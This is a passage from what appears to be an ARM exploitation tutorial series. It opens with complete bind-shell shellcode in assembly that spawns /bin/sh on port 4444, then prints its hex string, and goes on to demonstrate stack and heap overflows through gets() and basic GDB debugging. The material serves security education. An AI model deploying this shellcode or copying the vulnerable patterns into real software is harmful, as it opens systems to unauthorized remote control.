    mov     r0, r4          // r0 = saved host_sockid 
    sub     r1, r1, r1      // clear r1, r1 = 0
    sub     r2, r2, r2      // clear r2, r2 = 0
    add     r7, #1          // r7 = 285 (accept syscall number)
    svc     #1
    mov     r4, r0          // save result (client_sockid) in r4

5 – STDIN, STDOUT, STDERR

 

For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.

    /* dup2(client_sockid, 0) */
    mov     r7, #63                // r7 = 63 (dup2 syscall number) 
    mov     r0, r4                 // r4 is the saved client_sockid 
    sub     r1, r1, r1             // r1 = 0 (stdin) 
    svc     #1
    /* dup2(client_sockid, 1) */
    mov     r0, r4                 // r4 is the saved client_sockid 
    add     r1, #1                 // r1 = 1 (stdout) 
    svc     #1
    /* dup2(client_sockid, 2) */
    mov     r0, r4                 // r4 is the saved client_sockid
    add     r1, #1                 // r1 = 1+1 (stderr) 
    svc     #1

6 – Spawn the Shell

 

 

// execve("/bin/sh", 0, 0) 
 adr r0, shellcode     // r0 = location of "/bin/shX"
 eor r1, r1, r1        // clear register r1. R1 = 0
 eor r2, r2, r2        // clear register r2. r2 = 0
 strb r2, [r0, #7]     // store null-byte for AF_INET
 mov r7, #11           // execve syscall number
 svc #1
 nop

The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.

Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.

struct_addr:
.ascii "\x02\xff"      // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"     // port number 4444 
.byte 1,1,1,1        // IP Address 
shellcode:
.ascii "/bin/shX"
FINAL ASSEMBLY CODE

This is what our final bind shellcode looks like.

.section .text
.global _start
    _start:
    .ARM
    add r3, pc, #1         // switch to thumb mode 
    bx r3

    .THUMB
// socket(2, 1, 0)
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2      // set r2 to null
    mov r7, #200        // r7 = 281 (socket)
    add r7, #81         // r7 value needs to be split 
    svc #1              // r0 = host_sockid value
    mov r4, r0          // save host_sockid in r4

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr // pointer to address, port
    strb r2, [r1, #1]    // write 0 for AF_INET
    strb r2, [r1, #4]    // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
    mov r2, #16          // struct address length
    add r7, #1           // r7 = 282 (bind) 
    svc #1
    nop

// listen(sockfd, 0) 
    mov r0, r4           // set r0 to saved host_sockid
    mov r1, #2        
    add r7, #2           // r7 = 284 (listen syscall number) 
    svc #1        

// accept(sockfd, NULL, NULL); 
    mov r0, r4           // set r0 to saved host_sockid
    sub r1, r1, r1       // set r1 to null
    sub r2, r2, r2       // set r2 to null
    add r7, #1           // r7 = 284+1 = 285 (accept syscall)
    svc #1               // r0 = client_sockid value
    mov r4, r0           // save new client_sockid value to r4  

// dup2(sockfd, 0) 
    mov r7, #63         // r7 = 63 (dup2 syscall number) 
    mov r0, r4          // r4 is the saved client_sockid 
    sub r1, r1, r1      // r1 = 0 (stdin) 
    svc #1

// dup2(sockfd, 1)
    mov r0, r4          // r4 is the saved client_sockid 
    add r1, #1          // r1 = 1 (stdout) 
    svc #1

// dup2(sockfd, 2) 
    mov r0, r4          // r4 is the saved client_sockid
    add r1, #1          // r1 = 2 (stderr) 
    svc #1

// execve("/bin/sh", 0, 0) 
    adr r0, shellcode   // r0 = location of "/bin/shX"
    eor r1, r1, r1      // clear register r1. R1 = 0
    eor r2, r2, r2      // clear register r2. r2 = 0
    strb r2, [r0, #7]   // store null-byte for AF_INET
    mov r7, #11         // execve syscall number
    svc #1
    nop

struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c" // port number 4444 
.byte 1,1,1,1 // IP Address 
shellcode:
.ascii "/bin/shX"
TESTING SHELLCODE

Save your assembly code into a file called bind_shell.s. Don’t forget the -N flag when using ld. The reason for this is that we use multiple the strb operations to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

pi@raspberrypi:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
pi@raspberrypi:~/bindshell $ ./bind_shell

Then, connect to your specified port:

pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
uname -a
Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux

It works! Now let’s translate it into a hex string with the following command:

pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin
pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind_shell.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the amount of instructions, hence making the shellcode shorter.

ARM LAB ENVIRONMENT

Let’s say you got curious about ARM assembly or exploitation and want to write your first assembly scripts or solve some ARM challenges. For that you either need an Arm device (e.g. Raspberry Pi), or you set up your lab environment in a VM for quick access.

This page contains 3 levels of lab setup laziness.

  • Manual Setup – Level 0
  • Ain’t nobody got time for that – Level 1
  • Ain’t nobody got time for that – Level 2
MANUAL SETUP – LEVEL 0

If you have the time and nerves to set up the lab environment yourself, I’d recommend doing it. You might get stuck, but you might also learn a lot in the process. Knowing how to emulate things with QEMU also enables you to choose what ARM version you want to emulate in case you want to practice on a specific processor.

How to emulate Raspbian with QEMU.

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 1

Welcome on laziness level 1. I see you don’t have time to struggle through various linux and QEMU errors, or maybe you’ve tried setting it up yourself but some random error occurred and after spending hours trying to fix it, you’ve had enough.

Don’t worry, here’s a solution: Hugsy (aka creator of GEF) released ready-to-play Qemu images for architectures like ARM, MIPS, PowerPC, SPARC, AARCH64, etc. to play with. All you need is Qemu. Then download the link to your image, and unzip the archive.

Become a ninja on non-x86 architectures

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 2

Let me guess, you don’t want to bother with any of this and just want a ready-made Ubuntu VM with all QEMU stuff setup and ready-to-play. Very well. The first Azeria-Labs VM is ready. It’s a naked Ubuntu VM containing an emulated ARMv6l.

This VM is also for those of you who tried emulating ARM with QEMU but got stuck for inexplicable linux reasons. I understand the struggle, trust me.

Download here:

VMware image size:

  • Downloaded zip: Azeria-Lab-v1.7z (4.62 GB)
    • MD5: C0EA2F16179CF813D26628DC792C5DE6
    • SHA1: 1BB1ABF3C277E0FD06AF0AECFEDF7289730657F2
  • Extracted VMware image: ~16GB

Password: azerialabs

Host system specs:

  • Ubuntu 16.04.3 LTS 64-bit (kernel 4.10.0-38-generic) with Gnome 3
  • HDD: ~26GB (ext4) + ~4GB Swap
  • RAM (configured): 4GB

QEMU setup:

  • Raspbian 8 (27-04-10-raspbian-jessie) 32-bit (kernel qemu-4.4.34-jessie)
  • HDD: ~8GB
  • RAM: ~256MB
  • Tools: GDB (Raspbian 7.7.1+dfsg-5+rpi1) with GEF

I’ve included a Lab VM Starter Guide and set it as the background image of the VM. It explains how to start up QEMU, how to write your first assembly program, how to assemble and disassemble, and some debugging basics. Enjoy!

ARM PROCESS MEMORY AND MEMORY CORRUPTIONS

PROCESS MEMORY AND MEMORY CORRUPTIONS

The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the first tutorial series “ARM Assembly Basics“). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger.

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer
  3. Format String

The examples used in this tutorial are compiled on an ARMv6 32-bit processor. If you don’t have access to an ARM device, you can create your own lab and emulate a Raspberry Pi distro in a VM by following this tutorial: Emulate Raspberry Pi with QEMU. The debugger used here is GDB with GEF (GDB Enhanced Features). If you aren’t familiar with these tools, you can check out this tutorial: Debugging with GDB and GEF.

MEMORY LAYOUT OF A PROCESS

Every time we start a program, a memory area for that program is reserved. This area is then split into multiple regions. Those regions are then split into even more regions (segments), but we will stick with the general overview. So, the parts we are interested are:

  1. Program Image
  2. Heap
  3. Stack

In the picture below we can see a general representation of how those parts are laid out within the process memory. The addresses used to specify memory regions are just for the sake of an example, because they will differ from environment to environment, especially when ASLR is used.

Program Image region basically holds the program’s executable file which got loaded into the memory. This memory region can be split into various segments: .plt, .text, .got, .data, .bss and so on. These are the most relevant. For example, .text contains the executable part of the program with all the Assembly instructions, .data and .bss holds the variables or pointers to variables used in the application, .plt and .got stores specific pointers to various imported functions from, for example, shared libraries. From a security standpoint, if an attacker could affect the integrity (rewrite) of the .text section, he could execute arbitrary code. Similarly, corruption of Procedure Linkage Table (.plt) and Global Offsets Table (.got) could under specific circumstances lead to execution of arbitrary code.

The Stack and Heap regions are used by the application to store and operate on temporary data (variables) that are used during the execution of the program. These regions are commonly exploited by attackers, because data in the Stack and Heap regions can often be modified by the user’s input, which, if not handled properly, can cause a memory corruption. We will look into such cases later in this chapter.

In addition to the mapping of the memory, we need to be aware of the attributes associated with different memory regions. A memory region can have one or a combination of the following attributes: Read, Write, eXecute. The Read attribute allows the program to read data from a specific region. Similarly, Write allows the program to write data into a specific memory region, and Execute – execute instructions in that memory region. We can see the process memory regions in GEF (a highly recommended extension for GDB) as shown below:

azeria@labs:~/exp $ gdb program
...
gef> gef config context.layout "code"
gef> break main
Breakpoint 1 at 0x104c4: file program.c, line 6.
gef> run
...
gef> nexti 2
-----------------------------------------------------------------------------------------[ code:arm ]----
...
      0x104c4 <main+20>        mov    r0,  #8
      0x104c8 <main+24>        bl     0x1034c <malloc@plt>
->    0x104cc <main+28>        mov    r3,  r0
      0x104d0 <main+32>        str    r3,  [r11,  #-8]
...
gef> vmmap
Start      End        Offset     Perm Path
0x00010000 0x00011000 0x00000000 r-x /home/azeria/exp/program <---- Program Image
0x00020000 0x00021000 0x00000000 rw- /home/azeria/exp/program <---- Program Image continues...
0x00021000 0x00042000 0x00000000 rw- [heap] <---- HEAP
0xb6e74000 0xb6f9f000 0x00000000 r-x /lib/arm-linux-gnueabihf/libc-2.19.so <---- Shared library (libc)
0xb6f9f000 0xb6faf000 0x0012b000 --- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6faf000 0xb6fb1000 0x0012b000 r-- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb1000 0xb6fb2000 0x0012d000 rw- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb2000 0xb6fb5000 0x00000000 rw-
0xb6fcc000 0xb6fec000 0x00000000 r-x /lib/arm-linux-gnueabihf/ld-2.19.so <---- Shared library (ld)
0xb6ffa000 0xb6ffb000 0x00000000 rw-
0xb6ffb000 0xb6ffc000 0x0001f000 r-- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffc000 0xb6ffd000 0x00020000 rw- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffd000 0xb6fff000 0x00000000 rw-
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rw- [stack] <---- STACK
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

The Heap section in the vmmap command output appears only after some Heap related function was used. In this case we see the malloc function being used to create a buffer in the Heap region. So if you want to try this out, you would need to debug a program that makes a malloc call (you can find some examples in this page, scroll down or use find function).

Additionally, in Linux we can inspect the process’ memory layout by accessing a process-specific “file”:

azeria@labs:~/exp $ ps aux | grep program
azeria   31661 12.3 12.1  38680 30756 pts/0    S+   23:04   0:10 gdb program
azeria   31665  0.1  0.2   1712   748 pts/0    t    23:04   0:00 /home/azeria/exp/program
azeria   31670  0.0  0.7   4180  1876 pts/1    S+   23:05   0:00 grep --color=auto program
azeria@labs:~/exp $ cat /proc/31665/maps
00010000-00011000 r-xp 00000000 08:02 274721     /home/azeria/exp/program
00020000-00021000 rw-p 00000000 08:02 274721     /home/azeria/exp/program
00021000-00042000 rw-p 00000000 00:00 0          [heap]
b6e74000-b6f9f000 r-xp 00000000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6f9f000-b6faf000 ---p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6faf000-b6fb1000 r--p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb1000-b6fb2000 rw-p 0012d000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb2000-b6fb5000 rw-p 00000000 00:00 0
b6fcc000-b6fec000 r-xp 00000000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffa000-b6ffb000 rw-p 00000000 00:00 0
b6ffb000-b6ffc000 r--p 0001f000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffc000-b6ffd000 rw-p 00020000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffd000-b6fff000 rw-p 00000000 00:00 0
b6fff000-b7000000 r-xp 00000000 00:00 0          [sigpage]
befdf000-bf000000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

Most programs are compiled in a way that they use shared libraries. Those libraries are not part of the program image (even though it is possible to include them via static linking) and therefore have to be referenced (included) dynamically. As a result, we see the libraries (libc, ld, etc.) being loaded in the memory layout of a process. Roughly speaking, the shared libraries are loaded somewhere in the memory (outside of process’ control) and our program just creates virtual “links” to that memory region. This way we save memory without the need to load the same library in every instance of a program.

INTRODUCTION INTO MEMORY CORRUPTIONS

A memory corruption is a software bug type that allows to modify the memory in a way that was not intended by the programmer. In most cases, this condition can be exploited to execute arbitrary code, disable security mechanisms, etc. This is done by crafting and injecting a payload which alters certain memory sections of a running program. The following list contains the most common memory corruption types/vulnerabilities:

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer (Use-after-free)
  3. Format String

In this chapter we will try to get familiar with the basics of Buffer Overflow memory corruption vulnerabilities (the remaining ones will be covered in the next chapter). In the examples we are about to cover we will see that the main cause of memory corruption vulnerabilities is an improper user input validation, sometimes combined with a logical flaw. For a program, the input (or a malicious payload) might come in a form of a username, file to be opened, network packet, etc. and can often be influenced by the user. If a programmer did not put safety measures for potentially harmful user input it is often the case that the target program will be subject to some kind of memory related issue.

BUFFER OVERFLOWS

Buffer overflows are one of the most widespread memory corruption classes and are usually caused by a programming mistake which allows the user to supply more data than there is available for the destination variable (buffer). This happens, for example, when vulnerable functions, such as getsstrcpymemcpy or others are used along with data supplied by the user. These functions do not check the length of the user’s data which can result into writing past (overflowing) the allocated buffer. To get a better understanding, we will look into basics of Stack and Heap based buffer overflows.

Stack Overflow

Stack overflow, as the name suggests, is a memory corruption affecting the Stack. While in most cases arbitrary corruption of the Stack would most likely result in a program’s crash, a carefully crafted Stack buffer overflow can lead to arbitrary code execution. The following picture shows an abstract overview of how the Stack can get corrupted.

As you can see in the picture above, the Stack frame (a small part of the whole Stack dedicated for a specific function) can have various components: user data, previous Frame Pointer, previous Link Register, etc. In case the user provides too much of data for a controlled variable, the FP and LR fields might get overwritten. This breaks the execution of the program, because the user corrupts the address where the application will return/jump after the current function is finished.

To check how it looks like in practice we can use this example:

/*azeria@labs:~/exp $ gcc stack.c -o stack*/
#include "stdio.h"

int main(int argc, char **argv)
{
char buffer[8];
gets(buffer);
}

Our sample program uses the variable “buffer”, with the length of 8 characters, and a function “gets” for user’s input, which simply sets the value of the variable “buffer” to whatever input the user provides. The disassembled code of this program looks like the following:

Here we suspect that a memory corruption could happen right after the function “gets” is completed. To investigate this, we place a break-point right after the branch instruction that calls the “gets” function – in our case, at address 0x0001043c. To reduce the noise we configure GEF’s layout to show us only the code and the Stack (see the command in the picture below). Once the break-point is set, we proceed with the program and provide 7 A’s as the user’s input (we use 7 A’s, because a null-byte will be automatically appended by function “gets”).

When we investigate the Stack of our example we see (image above) that the Stack frame is not corrupted. This is because the input supplied by the user fits in the expected 8 byte buffer and the previous FP and LR values within the Stack frame are not corrupted. Now let’s provide 16 A’s and see what happens.

In the second example we see (image above) that when we provide too much of data for the function “gets”, it does not stop at the boundaries of the target buffer and keeps writing “down the Stack”. This causes our previous FP and LR values to be corrupted. When we continue running the program, the program crashes (causes a “Segmentation fault”), because during the epilogue of the current function the previous values of FP and LR are “poped” off the Stack into R11 and PC registers forcing the program to jump to address 0x41414140 (last byte gets automatically converted to 0x40 because of the switch to Thumb mode), which in this case is an illegal address. The picture below shows us the values of the registers (take a look at $pc) at the time of the crash.

Heap Overflow

First of all, Heap is a more complicated memory location, mainly because of the way it is managed. To keep things simple, we stick with the fact that every object placed in the Heap memory section is “packed” into a “chunk” having two parts: header and user data (which sometimes the user controls fully). In the Heap’s case, the memory corruption happens when the user is able to write more data than is expected. In that case, the corruption might happen within the chunk’s boundaries (intra-chunk Heap overflow), or across the boundaries of two (or more) chunks (inter-chunk Heap overflow). To put things in perspective, let’s take a look at the following illustration.

As shown in the illustration above, the intra-chunk heap overflow happens when the user has the ability to supply more data to u_data_1and cross the boundary between u_data_1 and u_data_2. In this way the fields/properties of the current object get corrupted. If the user supplies more data than the current Heap chunk can accommodate, then the overflow becomes inter-chunk and results into a corruption of the adjacent chunk(s).

Intra-chunk Heap overflow

To illustrate how an intra-chunk Heap overflow looks like in practice we can use the following example and compile it with “-O” (optimization flag) to have a smaller (binary) program (easier to look through).

/*azeria@labs:~/exp $ gcc intra_chunk.c -o intra_chunk -O*/
#include "stdlib.h"
#include "stdio.h"

struct u_data                                          //object model: 8 bytes for name, 4 bytes for number
{
 char name[8];
 int number;
};

int main ( int argc, char* argv[] )
{
 struct u_data* objA = malloc(sizeof(struct u_data)); //create object in Heap

 objA->number = 1234;                                 //set the number of our object to a static value
 gets(objA->name);                                    //set name of our object according to user's input

 if(objA->number == 1234)                             //check if static value is intact
 {
  puts("Memory valid");
 }
 else                                                 //proceed here in case the static value gets corrupted
 {
  puts("Memory corrupted");
 }
}

The program above does the following:

  1. Defines a data structure (u_data) with two fields
  2. Creates an object (in the Heap memory region) of type u_data
  3. Assigns a static value to the number’s field of the object
  4. Prompts user to supply a value for the name’s field of the object
  5. Prints a string depending on the value of the number’s field

So in this case we also suspect that the corruption might happen after the function “gets”. We disassemble the target program’s main function to get the address for a break-point.

In this case we set the break-point at address 0x00010498 – right after the function “gets” is completed. We configure GEF to show us the code only. We then run the program and provide 7 A’s as a user input.

Once the break-point is hit, we quickly lookup the memory layout of our program to find where our Heap is. We use vmmap command and see that our Heap starts at the address 0x00021000. Given the fact that our object (objA) is the first and the only one created by the program, we start analyzing the Heap right from the beginning.

The picture above shows us a detailed break down of the Heap’s chunk associated with our object. The chunk has a header (8 bytes) and the user’s data section (12 bytes) storing our object. We see that the name field properly stores the supplied string of 7 A’s, terminated by a null-byte. The number field, stores 0x4d2 (1234 in decimal). So far so good. Let’s repeat these steps, but in this case enter 8 A’s.

While examining the Heap this time we see that the number’s field got corrupted (it’s now equal to 0x400 instead of 0x4d2). The null-byte terminator overwrote a portion (last byte) of the number’s field. This results in an intra-chunk Heap memory corruption. Effects of such a corruption in this case are not devastating, but visible. Logically, the else statement in the code should never be reached as the number’s field is intended to be static. However, the memory corruption we just observed makes it possible to reach that part of the code. This can be easily confirmed by the example below.

Inter-chunk Heap overflow

To illustrate how an inter-chunk Heap overflow looks like in practice we can use the following example, which we now compile withoutoptimization flag.

/*azeria@labs:~/exp $ gcc inter_chunk.c -o inter_chunk*/
#include "stdlib.h"
#include "stdio.h"

int main ( int argc, char* argv[] )
{
 char *some_string = malloc(8);  //create some_string "object" in Heap
 int *some_number = malloc(4);   //create some_number "object" in Heap

 *some_number = 1234;            //assign some_number a static value
 gets(some_string);              //ask user for input for some_string

 if(*some_number == 1234)        //check if static value (of some_number) is in tact
 {
 puts("Memory valid");
 }
 else                            //proceed here in case the static some_number gets corrupted
 {
 puts("Memory corrupted");
 }
}

The process here is similar to the previous ones: set a break-point after function “gets”, run the program, supply 7 A’s, investigate Heap.

Once the break-point is hit, we examine the Heap. In this case, we have two chunks. We see (image below) that their structure is in tact: the some_string is within its boundaries, the some_number is equal to 0x4d2.

Now, let’s supply 16 A’s and see what happens.

As you might have guessed, providing too much of input causes the overflow resulting into corruption of the adjacent chunk. In this case we see that our user input corrupted the header and the first byte of the some_number’s field. Here again, by corrupting the some_number we manage to reach the code section which logically should never be reached.

SUMMARY

In this part of the tutorial we got familiar with the process memory layout and the basics of Stack and Heap related memory corruptions. In the next part of this tutorial series we will cover other memory corruptions: Dangling pointer and Format String. Once we cover the most common types of memory corruptions, we will be ready for learning how to write working exploits.

ARM DEBUGGING WITH GDB

DEBUGGING WITH GDB

This is a very brief introduction into compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you just set up your own Lab environment in a VM by following the steps in this short How-To.

You can use the following code from Stack and Functions, to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
    push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
    mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    bl max            /* Calling/branching to function max */
    sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
    push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
    cmp r0, r1        /* Implementation of if(a<b) */
    movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
    add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11}         /* restoring frame pointer */
    bx lr             /* End of the epilogue. Jumping back to main via LR register */

Personally, I prefer using GEF as a GDB extension. It gives me a better overview and useful features. You can try it out here: GEF – GDB Enhanced Features.

Save the code above in a file called max.s and compile it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

  • Load a memory dump after a crash (post-mortem debugging)
  • Attach to a running process (used for server processes)
  • Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

  • Attach to a process: $ gdb -pid $(pidof <process>)
  • Debug a binary: $ gdb ./file
  • Inspect a core (crash) file: $ gdb -c ./core.3243
$ gdb max

If you installed GEF, it drops you the gef> prompt.

This is how you get help:

  • (gdb) h
  • (gdb) apropos <search-term>
gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

  • break (or just b) <function-name>
  • break <line-number>
  • break filename:function
  • break filename:line-number
  • break *<address>
  • break  +<offset>  
  • break  –<offset>
  • tbreak (set a temporary breakpoint)
  • del <number>  (delete breakpoint number x)
  • delete (delete all breakpoints)
  • delete <range> (delete breakpoint ranges)
  • disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
  • continue (or just c) – (continue executing until next breakpoint)
  • continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
  • finish (continue to end of function)
gef> break _start
gef> info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x00008054 <_start>
 breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you would not delete the first breakpoint and just set a new one and run, it would break at the first breakpoint.

Start and Stop:

  • Start program execution from beginning of the program
    • run
    • r
    • run <command-line-argument>
  • Stop program execution
    • kill
  • Exit GDB debugger
    • quit
    • q
gef> run

Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats.

Syntax: x/<count><format><unit>
FORMAT UNIT
x – Hexadecimal b – bytes
d – decimal h – half words (2 bytes)
i – instructions w – words (4 bytes)
t – binary (two) g – giant words (8 bytes)
o – octal
u – unsigned
s – string
c – character
gef> x/10i $pc
=> 0x8054 <_start>: push {r11, lr}
 0x8058 <_start+4>: add r11, sp, #0
 0x805c <_start+8>: sub sp, sp, #16
 0x8060 <_start+12>: mov r0, #1
 0x8064 <_start+16>: mov r1, #2
 0x8068 <_start+20>: bl 0x8074 <max>
 0x806c <_start+24>: sub sp, r11, #0
 0x8070 <_start+28>: pop {r11, pc}
 0x8074 <max>: push {r11}
 0x8078 <max+4>: add r11, sp, #0
gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001  0xe24bd000  0xe8bd8800  0xe92d0800
0x8078 <max+4>:     0xe28db000  0xe24dd00c  0xe1500001  0xb1a00001
0x8088 <max+20>:    0xe28bd000  0xe8bd0800  0xe12fff1e  0x00001741
0x8098:             0x61656100  0x01006962  0x0000000d  0x01080206

Commands for stepping through the code:

  • Step to next line of code. Will step into a function
    • stepi
    • s
    • step <number-of-steps-to-perform>
  • Execute next line of code. Will not enter functions
    • nexti
    • n
    • next <number>
  • Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number
    • until
    • until <line-number>
  • Show current line number and which function you are in
    • where
gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max> push {r11}
0x8078 <max+4> add r11, sp, #0
0x807c <max+8> sub sp, sp, #12
0x8080 <max+12> cmp r0, r1
0x8084 <max+16> movlt r0, r1
0x8088 <max+20> add sp, r11, #0

Examine the registers with info registers or i r

gef> info registers
r0     0x1     1
r1     0x2     2
r2     0x0     0
r3     0x0     0
r4     0x0     0
r5     0x0     0
r6     0x0     0
r7     0x0     0
r8     0x0     0
r9     0x0     0
r10    0x0     0
r11    0xbefff7e8 3204446184
r12    0x0     0
sp     0xbefff7d8 0xbefff7d8
lr     0x0     0
pc     0x8068  0x8068 <_start+20>
cpsr   0x10    16

The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

 Start Addr   End Addr    Size     Offset objfile
     0x8000     0x9000  0x1000          0   /home/pi/lab/max
 0xb6fff000 0xb7000000  0x1000          0          [sigpage]
 0xbefdf000 0xbf000000 0x21000          0            [stack]
 0xffff0000 0xffff1000  0x1000          0          [vectors]

With the command “disassemble” we look through the disassembly output of the function max.

gef> disassemble max
 Dump of assembler code for function max:
 0x00008074 <+0>: push {r11}
 0x00008078 <+4>: add r11, sp, #0
 0x0000807c <+8>: sub sp, sp, #12
 0x00008080 <+12>: cmp r0, r1
 0x00008084 <+16>: movlt r0, r1
 0x00008088 <+20>: add sp, r11, #0
 0x0000808c <+24>: pop {r11}
 0x00008090 <+28>: bx lr
 End of assembler dump.

GEF specific commands (more commands can be viewed using the command “gef”):

  • Dump all sections of all loaded ELF images in process memory
    • xfiles
  • Enhanced version of proc map, includes RWX attributes in mapped pages
    • vmmap
  • Memory attributes at a given address
    • xinfo
  • Inspect compiler level protection built into the running binary
    • checksec
gef> xfiles
     Start        End  Name File
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
gef> vmmap
     Start        End     Offset Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
